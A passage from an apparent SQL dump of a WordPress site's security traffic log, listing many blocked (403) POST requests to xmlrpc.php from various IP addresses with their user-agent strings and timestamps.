Safari\\/537.36\"}','XxDMeqBN29t4yIPYErJjdkGb',0,1680842775.2491,1947,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','lyEWQuqkLX41Z0V2hOotxBCi',0,1680842786.5869,562,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','8PbpIeRKBS0Ya6qFOg5oCVms',0,1680842792.4183,556,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','MFTCv8di5WhnHUOSfItzrZ3s',0,1680842793.4344,563,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','S3EjrMkoyu2TpGBYDlfwz8Fc',0,1680842800.3342,563,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','iuCwqjc4ohDIKbeQYUHtlFyv',0,1680842804.6889,965,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','jHzUDgyTm1ScXfupw7AsGqVQ',0,1680842805.2524,844,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','K0PXWtrv4wFlRUj5pAYS6zak',0,1680844258.3233,3870,'','POST',403,0,515,0,1,'',0),('31.170.22.49',531240497,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','7TXUpoPFGO6Ns94DumrtgEcK',0,1680844265.5384,1536,'','POST',403,0,515,0,1,'',0),('35.240.237.113',602991985,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','LiBsHpdu4J6otm5N8eV9Gak1',0,1680844265.7464,1405,'','POST',403,0,515,0,1,'',0),('154.53.38.46',2587174446,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','j6gH8odJbeUhnEkv1TqBDcfK',0,1680844278.8665,1576,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Voyu5vcrMQZwimJx3fNLtsDH',0,1680844284.6525,618,'','POST',403,0,515,0,1,'',0),('35.240.237.113',602991985,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','GZnreVEuhFylmivqI0WAXUP1',0,1680844290.1171,585,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','KtA5fy7zSTZUGCL3X98pdbia',0,1680844291.0512,622,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','KhYbtIjgQFyR5UixBCNc9X28',0,1680844296.8585,556,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','YhH5lnIUPM4Bqi0XfNt3ZCDu',0,1680844299.3137,595,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','oPDhsZiw9F15TcgvOBNtLdWM',0,1680844307.6684,617,'','POST',403,0,515,0,1,'',0),('47.242.191.83',804437843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','RxOgWU4VwcvhaIPSJN3i6jbT',0,1680844318.3303,570,'','POST',403,0,515,0,1,'',0),('113.160.250.146',1906375314,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','D46kY8JalGNLfj3yAM9v2VtT',0,1680844321.6953,576,'','POST',403,0,515,0,1,'',0),('107.167.244.67',1806169155,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1b3GaHXo2ZPAyfjviqtlpL7E',0,1680844531.8523,3094,'','POST',403,0,515,0,1,'',0),('82.102.27.163',1382423459,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gy2hmoU98n1CBsYxPkSQ7fdI',0,1680845295.6711,765,'','POST',403,0,515,0,1,'',0),('199.249.223.130',3355041666,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','msQOhBr23yVlSkN4G69TJtoF',0,1680848160.4167,1669,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','SKp9MorBVWeEbXQHf5ycutkJ',0,1680849456.1071,785,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','5H7B3JPSZ0uI8xGkNLYW6v2h',0,1680849457.4637,1276,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','eugvH0yN6oARtfLkFd7K5wVi',0,1680849457.4632,1302,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','fsq091nXYPH8iR2IAKJQCZxv',0,1680849461.2317,733,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','3hWuC81olkwrtAXGSzpfTxjn',0,1680849461.9899,623,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','UmpZnrilEbAfHX1KWGBNSykP',0,1680849471.7004,585,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','Gd9YPQXcFKIgv1aWN2rkMRSB',0,1680849479.0360,646,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','2SLZd3U8mTWkE5wh1Opglciz',0,1680849479.7530,581,'','POST',403,0,515,0,1,'',0),('43.143.239.49',730853169,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','jk9tMehEm4KIzoPCsYDNTlxB',0,1680849484.0461,616,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','9dIGQqxoDh0zcubPO5tNnRlm',0,1680849498.5310,636,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','39Z5Wl6tfzwKHGDdYQMouygx',0,1680849499.6320,587,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','JaOyA2g5ckuHmosLSvQlRG1Y',0,1680850949.7653,2707,'','POST',403,0,515,0,1,'',0),('68.178.145.169',1152553385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','CVH9DQTumeG7YiZJF4avdAxN',0,1680850952.6271,676,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','qXJYOQVNt5xnSK9D3hgowHFm',0,1680850962.4283,627,'','POST',403,0,515,0,1,'',0),('163.172.60.103',2745973863,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','SF7tIHP42EX5J3fUTyKg6dnV',0,1680850964.7266,1012,'','POST',403,0,515,0,1,'',0),('103.133.215.217',1736824793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','qaMgS3I6Lf5xD8omjZ7hBJtY',0,1680850965.2559,903,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','FoMtS5D2TeqagQ3Yvbrlm1nE',0,1680850974.3699,715,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','xFfrC8JE4QgabGHTeVmIBRyi',0,1680850975.1957,645,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','gLNqlWH2Qpkhsv1iYMxA5dbZ',0,1680850983.3033,661,'','POST',403,0,515,0,1,'',0),('217.138.195.27',3649749787,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wxcWL41pZyi6H2FsGhYSNjen',0,1680853485.5642,3611,'','POST',403,0,515,0,1,'',0),('47.242.191.83',804437843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','jblhTsASfp3cwqIGV4PMYoJ2',0,1680854055.0138,3901,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','8TWzEyKu0kQxmHDNIjsnSdAp',0,1680854058.6799,711,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','6f5guLl2SG4p01EtxMDPAqXd',0,1680854062.4411,538,'','POST',403,0,515,0,1,'',0),('103.142.25.164',1737365924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','wP6f3RNEtLiAyFp1YHMmZO5d',0,1680854065.7745,1011,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','bsclaSXm57orY8hqAwtjkgB3',0,1680854077.1460,1121,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','FHCLZAOltTo1rB3pPqJWnN4y',0,1680854077.7592,936,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','vtmZDNdJpoukfOQAX4slB5MF',0,1680854080.6118,594,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','wFIW0MUvkuXYHQbmE5T4ocdf',0,1680854085.4660,559,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','raWvpbftVZey0Sg6FjMK24uT',0,1680854096.0571,1492,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','PL1Hd8EiqV7z5jXU0MwRQoAh',0,1680854095.6359,2213,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','nhys0vDBtM3QJpL75WgSCPX6',0,1680854104.2971,616,'','POST',403,0,515,0,1,'',0),('217.138.195.19',3649749779,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','taVPQ6TYZpr7NE8Mh4qyFiOL',0,1680854927.4935,3711,'','POST',403,0,515,0,1,'',0),('62.102.148.154',1046910106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','P1bLjSMF28lnRG07DB6mUqEz',0,1680855859.1558,3839,'','POST',403,0,515,0,1,'',0),('64.42.179.51',1076540211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lOMs20rLFcwGHbIQJgDqKdiY',0,1680856451.9728,3732,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','Ve8IxkK2ELSm9HMgv0sNnbX5',0,1680858513.1544,2121,'','POST',403,0,515,0,1,'',0),('114.132.219.217',1921309657,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','UDs2f50KT7VyQNCoauRHZvEB',0,1680858513.4138,2635,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','zGZwAJ5QHINodPEklV6i1srF',0,1680858517.7323,1255,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','gyB09DjXsmHIVREp26orvJPf',0,1680858518.0600,1213,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','OHu6MgYePiNRIo3pESZFhnb0',0,1680858522.3266,603,'','POST',403,0,515,0,1,'',0),('139.59.120.161',2335930529,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','F19s7fNBODJgzkZ4jyRPoVmu',0,1680858527.8460,665,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ZWrHEdRL6yf0m9lGtcAPgosM',0,1680858528.8885,630,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','lbyWFZ1wOI0LJSvdxiY53NoC',0,1680858529.7059,673,'','POST',403,0,515,0,1,'',0),('163.172.60.103',2745973863,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','sHumN7C40MP8jwBL6JEbyFoD',0,1680858532.5161,743,'','POST',403,0,515,0,1,'',0),('95.111.255.131',1601175427,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','0upxKoCGdYXsbPgtiJj126mI',0,1680859540.2729,4410,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','nGxCtzvKe1SLs0UWdBAjV69r',0,1680859543.9539,1100,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','b2qoHutEJFCrnjfd3UBeD4Si',0,1680859547.4182,611,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','rvGH7LQwNhFJaDZB5g8l01Oo',0,1680859552.3106,560,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','QAzHSJcK9EXtRD5ysBwZ0aFv',0,1680859559.0877,547,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','RCUytbO0KBNvq84Qp52mjnJP',0,1680859561.4576,556,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','QpnmP0Nd14XAaBiWbY6LsREf',0,1680859562.5921,554,'','POST',403,0,515,0,1,'',0),('103.130.218.158',1736628894,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','rWdSvZENjBfH6iUFQo8esgDV',0,1680859578.8363,616,'','POST',403,0,515,0,1,'',0),('45.140.185.41',764197161,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','bLhAnoPiVOR4kDfKqjYSZ2NC',0,1680859582.9362,548,'','POST',403,0,515,0,1,'',0),('87.107.147.56',1466667832,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','9Hh8Vw5FBjAx0dzqcpUMlXNk',0,1680859590.6375,583,'','POST',403,0,515,0,1,'',0),('37.120.132.83',628655187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5Tu1Vtw07yAMD3Ib98HYQGjK',0,1680862156.3868,4085,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mStAXJ16xRNHlsCdueDMpyr2',0,1680863394.5586,5675,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','4wkHc0o2sEKf39aGQZVtxPvR',0,1680863493.0706,552,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','9LheFlVU1mTOb8oKDpYsIWga',0,1680863496.0710,565,'','POST',403,0,515,0,1,'',0),('157.245.152.250',2650118394,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','yqsZhFVAwG1iQTO9fIES5YvD',0,1680863509.7473,593,'','POST',403,0,515,0,1,'',0),('172.105.163.59',2892604219,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','HqmnBwb4S60M7Faij2GWOJxz',0,1680863518.5873,628,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','hlkSiOQrzeJ1YD6CIgR0KcyG',0,1680863522.1932,568,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','K1fEdHnAUaG8lIuJQVhpew6P',0,1680863526.2453,565,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 